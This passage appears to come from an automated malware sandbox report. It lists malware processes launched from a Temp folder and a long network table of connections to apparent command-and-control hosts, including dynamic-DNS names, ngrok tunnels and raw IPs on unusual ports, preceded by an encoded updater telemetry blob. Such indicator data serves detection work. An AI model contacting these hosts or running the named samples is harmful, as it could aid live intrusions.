lZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3ODYwNDA4OCIgdG90YWw9IjE3ODYwNDA4OCIgZG93bmxvYWRfdGltZV9tcz0iNjcyMzUiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM4NDI5ODMyOTUiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM4NTY1Nzc1MzMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9IjE0NDc0MjMzNDgwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMzczNSIgZG93bmxvYWRfdGltZV9tcz0iODc0MDUwIiBkb3dubG9hZGVkPSIxNzg2MDQwODgiIHRvdGFsPSIxNzg2MDQwODgiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9IjYxNzQ5Ii8-PHBpbmcgYWN0aXZlPSIxIiBhPSI0IiByPSI0IiBhZD0iNjYxNSIgcmQ9IjY2MTUiIHBpbmdfZnJlc2huZXNzPSJ7MTU3ODY4MTItOTU1Qi00NTcxLTkyM0YtOUNFNTUyRDAyRjY1fSIvPjwvYXBwPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IjEzMy4wLjMwNjUuNTkiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiB1cGRhdGVfY291bnQ9IjEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxMDIzMjQ4ODQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQ0NzQyMzM0ODAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE0NjMxMjc1MjY4IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJkbyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYTQ3MmVjZWMtYWU2OS00NDllLWI3YTItNGU4NmRmZWU1OGE5P1AxPTE3NDAxMDExMTgmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bXlFUWNwNUtyaldDSjhwZmhQWktCNk5iVlJnU0UyQ2REbndmR3k3Y2txeWt0QVB0eHFiNUdRR3BYOUZkcmg3QnMlMmZyM2VONyUyZk9UMzNVVTElMmZ2ZTdpNXclM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIwIiB0b3RhbD0iMCIgZG93bmxvYWRfdGltZV9tcz0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDYzMTI3NTI2OCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYTQ3MmVjZWMtYWU2OS00NDllLWI3YTItNGU4NmRmZWU1OGE5P1AxPTE3NDAxMDExMTgmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bXlFUWNwNUtyaldDSjhwZmhQWktCNk5iVlJnU0UyQ2REbndmR3k3Y2txeWt0QVB0eHFiNUdRR3BYOUZkcmg3QnMlMmZyM2VONyUyZk9UMzNVVTElMmZ2ZTdpNXclM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSI1ODQ5ODEyOCIgdG90YWw9IjU4NDk4MTI4IiBkb3dubG9hZF90aW1lX21zPSIxNTAzMiIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDYzMTI3NTI2OCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDYzOTg2OTQzMiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxNDcwODY2NTMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSIzNzM1IiBkb3dubG9hZF90aW1lX21zPSIxNTY4OSIgZG93bmxvYWRlZD0iNTg0OTgxMjgiIHRvdGFsPSI1ODQ5ODEyOCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNTA3MjIiLz48cGluZyByPSI0IiByZD0iNjYxNSIgcGluZ19mcmVzaG5lc3M9Ins0MURBMTNGRS0wMzY0LTQyMzgtODQ1QS03NUEyQkRFMDlCOTl9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe"
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5956 -ip 5956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 448
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| IE | 4.245.161.190:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 104.77.160.78:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| HK | 154.92.19.29:1231 | 154.92.19.29 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 199.232.210.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| GB | 104.91.71.142:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| CN | 39.102.210.162:8080 | tcp | |
| DE | 18.197.239.109:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| DE | 18.197.239.109:8080 | 6.tcp.eu.ngrok.io | tcp |
| GB | 89.197.154.116:80 | 89.197.154.116 | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| N/A | 127.0.0.1:6606 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 52.28.247.255:8808 | 6.tcp.eu.ngrok.io | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| DE | 52.28.247.255:8080 | 6.tcp.eu.ngrok.io | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 104.91.71.142:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 18.197.239.109:18274 | 6.tcp.eu.ngrok.io | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:8808 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.69.115.178:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| N/A | 127.0.0.1:7707 | tcp | |
| DE | 3.69.115.178:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| DE | 3.69.115.178:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 52.28.247.255:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| DE | 52.28.247.255:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 52.28.247.255:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 104.219.239.11:6969 | tcp | |
| GB | 89.197.154.116:7810 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.69.157.220:18274 | 6.tcp.eu.ngrok.io | tcp |
| CN | 47.104.173.216:9876 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 3.69.157.220:8080 | 6.tcp.eu.ngrok.io | tcp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | bestsoftwaredownloads.com | udp |
| NL | 45.141.59.161:443 | bestsoftwaredownloads.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| DE | 3.69.157.220:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.68.171.119:8808 | 6.tcp.eu.ngrok.io | tcp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| DE | 3.68.171.119:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 3.68.171.119:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.68.171.119:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 3.68.171.119:18274 | 6.tcp.eu.ngrok.io | tcp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.66.38.117:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 3.66.38.117:8080 | 6.tcp.eu.ngrok.io | tcp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| DE | 3.66.38.117:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 18.197.239.109:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:8808 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 18.197.239.109:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 18.197.239.109:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 52.28.247.255:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| N/A | 127.0.0.1:8808 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 52.28.247.255:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.68.171.119:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 3.68.171.119:8808 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | sosomyhestor.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| DE | 3.68.171.119:18274 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.68.171.119:8080 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| SA | 46.153.112.54:443 | sosomyhestor.ddns.net | tcp |
| US | 8.8.8.8:53 | heo.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
